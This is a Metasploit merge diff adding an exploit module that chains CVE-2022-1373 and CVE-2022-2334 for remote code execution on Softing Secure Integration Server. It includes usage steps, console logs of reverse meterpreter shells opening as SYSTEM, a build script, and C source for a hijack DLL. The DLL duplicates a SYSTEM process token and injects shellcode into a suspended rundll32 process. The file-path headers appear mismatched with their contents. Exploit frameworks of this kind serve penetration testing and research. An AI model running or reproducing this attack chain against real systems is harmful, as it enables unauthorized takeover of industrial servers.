Land rapid7#19084, Add CVE-2022-1373 and CVE-2022-2334 exploit chain

Merge branch 'land-19084' into upstream-master

Author: bwatters-r7

data/exploits/CVE-2022-2334/template_x64_windows.dll

@@ -0,0 +1,115 @@
+## Description
+
+This module chains 2 vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.
+
+This was demonstrated by Steven Seeley and Chris Anastasio of Incite Team as part of Pwn2Own Miami 2022.
+
+In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.
+
+In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.
+
+The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication. When using asignature, any provided password is ignored. To use passwords again, `unset SIGNATURE`.
+
+A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. The DLL must be compiled with the correct exports, which can be found in "external/source/exploits/CVE-2022-2334/template.def". It is assumed that the operator has compiled the DLL correctly for the exploit, if a custom DLL is specified.
+
+## Vulnerable Application
+
+This module was tested against version 1.22, installed on Windows Server 2019 Standard x64. Older versions of the vulnerable application are no longer available for download.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Start `msfconsole`
+2. Do: `use exploit/windows/http/softing_sis_rce`
+3. Do: `set RHOSTS <target_ip>`
+4. Do: Optional: `set SSL true` if necessary
+5. Do: Optional: `set RPORT <target_port>` if SSL is set
+6. Do: `set USERNAME <username>` if necessary. Default is `admin`
+7. Do: `set PASSWORD <password>` if necessary. Default is `admin`
+8. Do: Optional: `set SIGNATURE <signature>` to use signature authentication. `PASSWORD` will be ignored if `SIGNATURE` is set!
+9. Do: Optional: `set DLLPATH <path_to_custom_dll>` to use a custom DLL. It is assumed that the DLL is correctly compiled by the operator for the exploit.
+10. Do: `exploit` and get a shell
+11. Do: Recommended: delete `C:\\Windows\\System32\\wbem\\wbemcomn.dll` 
+
+## Scenarios
+### Default options
+
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[+] 192.168.50.119:8099 - Valid credentials provided
+[*] Generating payload DLL...
+[*] Created /home/kali/.msf4/local/wbemcomn.dll
+[*] Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 1 opened (192.168.50.254:4444 -> 192.168.50.119:50525) at 2024-04-11 19:52:35 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Using a signature
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > set SIGNATURE f7f623f3d40764a03da6c3379919b964
+SIGNATURE => f7f623f3d40764a03da6c3379919b964
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[*] 192.168.50.119:8099 - Authenticating as user admin with signature f7f623f3d40764a03da6c3379919b964...
+[+] 192.168.50.119:8099 - Signature f7f623f3d40764a03da6c3379919b964 is valid for user admin
+[*] Generating payload DLL...
+[*] Created /home/kali/.msf4/local/wbemcomn.dll
+[*] 192.168.50.119:8099 - Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 4 opened (192.168.50.254:4444 -> 192.168.50.119:50618) at 2024-04-11 20:00:11 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Using a custom DLL
+```
+msf6 > use exploit/windows/http/softing_sis_rce
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/softing_sis_rce) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 exploit(windows/http/softing_sis_rce) > set DLLPATH /home/kali/Documents/softing/wbemcomn.dll
+DLLPATH => /home/kali/Documents/softing/wbemcomn.dll
+msf6 exploit(windows/http/softing_sis_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.254:4444
+[*] 192.168.50.119:8099 - Found Softing Secure Integration Server 1.22.0.8686
+[+] 192.168.50.119:8099 - Valid credentials provided
+[*] 192.168.50.119:8099 - Saving configuration...
+[*] Saved configuration to /home/kali/.msf4/local/config_download_5fd1e0fd8cd04a22f38eb8db14df68ff.zip
+[*] Sending stage (201798 bytes) to 192.168.50.119
+[!] Deleting: C:\Windows\System32\wbem\wbemcomn.dll
+[-] Unable to delete - stdapi_fs_delete_file: Operation failed: Access is denied.
+[*] Meterpreter session 5 opened (192.168.50.254:4444 -> 192.168.50.119:50696) at 2024-04-11 20:03:43 +0800
+[!] This exploit may require manual cleanup of 'C:\Windows\System32\wbem\wbemcomn.dll' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```

documentation/modules/exploit/windows/http/softing_sis_rce.md

@@ -0,0 +1,7 @@
+#!/bin/sh
+CCx64="x86_64-w64-mingw32"
+
+${CCx64}-gcc -shared -o temp.dll template.def template.c
+${CCx64}-strip -s temp.dll -o ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll
+rm -f temp.dll *.o
+chmod -x ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll

external/source/exploits/CVE-2022-2334/build.sh

@@ -0,0 +1,241 @@
+#include <windows.h>
+#include <sddl.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include <userenv.h>
+
+#include "template.h"
+
+void ExecutePayload(HANDLE hDll);
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+    switch (dwReason) {
+    case DLL_PROCESS_ATTACH:
+        ExecutePayload(hDll);
+        break;
+
+        case DLL_PROCESS_DETACH:
+        break;
+
+        case DLL_THREAD_ATTACH:
+        break;
+
+        case DLL_THREAD_DETACH:
+        break;
+    }
+    return TRUE;
+}
+
+BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
+    int result;
+
+    if (strlen(szStr) < strlen(szSuffix)) {
+        return FALSE;
+    }
+    if (bCaseSensitive) {
+        result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+    }
+    else {
+        result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
+    }
+    return result == 0;
+}
+
+BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
+    HANDLE hToken;
+    DWORD dwLength = 0;
+    TOKEN_USER *tuUser = NULL;
+    SIZE_T szSid = 0;
+
+    *pSid = NULL;
+    if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
+        return FALSE;
+    }
+
+    GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
+    tuUser = (TOKEN_USER *)malloc(dwLength);
+    if (!tuUser) {
+        return FALSE;
+    }
+
+    if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
+        free(tuUser);
+        return FALSE;
+    }
+
+    szSid = GetLengthSid(tuUser->User.Sid);
+    *pSid = LocalAlloc(LPTR, szSid);
+    if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) {
+        LocalFree(*pSid);
+        *pSid = NULL;
+    }
+
+    free(tuUser);
+    CloseHandle(hToken);
+    return *pSid != NULL;
+}
+
+BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
+    PSID pTestSid = NULL;
+    PSID pTargetSid = NULL;
+
+    if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
+        return FALSE;
+    }
+
+    if (!GetProcessSid(hProc, &pTestSid)) {
+        LocalFree(pTargetSid);
+        return FALSE;
+    }
+
+    *pbResult = EqualSid(pTestSid, pTargetSid);
+    LocalFree(pTargetSid);
+    LocalFree(pTestSid);
+    return TRUE;
+}
+
+DWORD FindProcessId(LPCTSTR szProcessName) {
+    HANDLE hProcessSnap;
+    PROCESSENTRY32 pe32;
+    DWORD result = 0;
+
+    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (hProcessSnap == INVALID_HANDLE_VALUE) {
+        return 0;
+    }
+
+    pe32.dwSize = sizeof(PROCESSENTRY32);
+    if (!Process32First(hProcessSnap, &pe32)) {
+        CloseHandle(hProcessSnap);
+        return 0;
+    }
+
+    do {
+        if (!strcmp(szProcessName, pe32.szExeFile)) {
+            result = pe32.th32ProcessID;
+            break;
+        }
+    } while (Process32Next(hProcessSnap, &pe32));
+    CloseHandle(hProcessSnap);
+    return result;
+}
+
+HANDLE GetPayloadToken(void) {
+    HANDLE hTokenHandle = NULL;
+    HANDLE hProcessHandle = NULL;
+    BOOL bIsSystem = FALSE;
+    DWORD dwPid = 0;
+    CHAR Path[MAX_PATH + 1];
+
+    ZeroMemory(Path, sizeof(Path));
+    GetModuleFileNameA(NULL, Path, MAX_PATH);
+    if (!StringEndsWithStringA(Path, "\\dataFEEDSISsvc.exe", TRUE)) {
+        return NULL;
+    }
+    /* loaded into the context of dataFEEDSISsvc.exe */
+
+    if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
+        return NULL;
+    }
+    /* and running as NT_AUTHORITY SYSTEM */
+
+    dwPid = FindProcessId("spoolsv.exe");
+    if (!dwPid) {
+        return NULL;
+    }
+
+    hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
+    if (!hProcessHandle) {
+        return NULL;
+    }
+
+    bIsSystem = FALSE;
+    if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
+        return NULL;
+    }
+    /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
+
+    OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
+    CloseHandle(hProcessHandle);
+    return hTokenHandle;
+}
+
+DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
+    /* wait for the process to exit or 10 seconds before cleaning up */
+    WaitForSingleObject(pExploitData->hProcess, 10000);
+    CloseHandle(pExploitData->hProcess);
+    CloseHandle(pExploitData->hMutex);
+
+    /* this does not return */
+    FreeLibraryAndExitThread(pExploitData->hModule, 0);
+    return 0;
+}
+
+void ExecutePayload(HANDLE hDll) {
+    PROCESS_INFORMATION pi;
+    STARTUPINFO si;
+    CONTEXT ctx;
+    LPVOID ep;
+    SECURITY_ATTRIBUTES MutexAttributes;
+    SIZE_T dwBytesWritten = 0;
+    PEXPLOIT_DATA pExploitData = NULL;
+    HANDLE hToken;
+
+    pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
+    if (!pExploitData) {
+        return;
+    }
+
+    /* keep a reference to the module for synchronization purposes */
+    GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
+
+    ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
+    MutexAttributes.nLength = sizeof(MutexAttributes);
+    MutexAttributes.bInheritHandle = TRUE; // inherit the handle
+    pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
+    if (!pExploitData->hMutex) {
+        return;
+    }
+
+    if (GetLastError() == ERROR_ALREADY_EXISTS) {
+        CloseHandle(pExploitData->hMutex);
+        return;
+    }
+
+    if (GetLastError() == ERROR_ACCESS_DENIED) {
+        CloseHandle(pExploitData->hMutex);
+        return;
+    }
+
+    hToken = GetPayloadToken();
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    /* start up the payload in a new process */
+    if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+        ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
+        GetThreadContext(pi.hThread, &ctx);
+        ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
+        if (dwBytesWritten == SCSIZE) {
+
+#ifdef _WIN64
+            ctx.Rip = (DWORD64)ep;
+#else
+            ctx.Eip = (DWORD)ep;
+#endif
+
+            SetThreadContext(pi.hThread, &ctx);
+            ResumeThread(pi.hThread);
+
+            CloseHandle(pi.hThread);
+            pExploitData->hProcess = pi.hProcess;
+        }
+    }
+
+    if (hToken) {
+        CloseHandle(hToken);
+    }
+    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL);
+}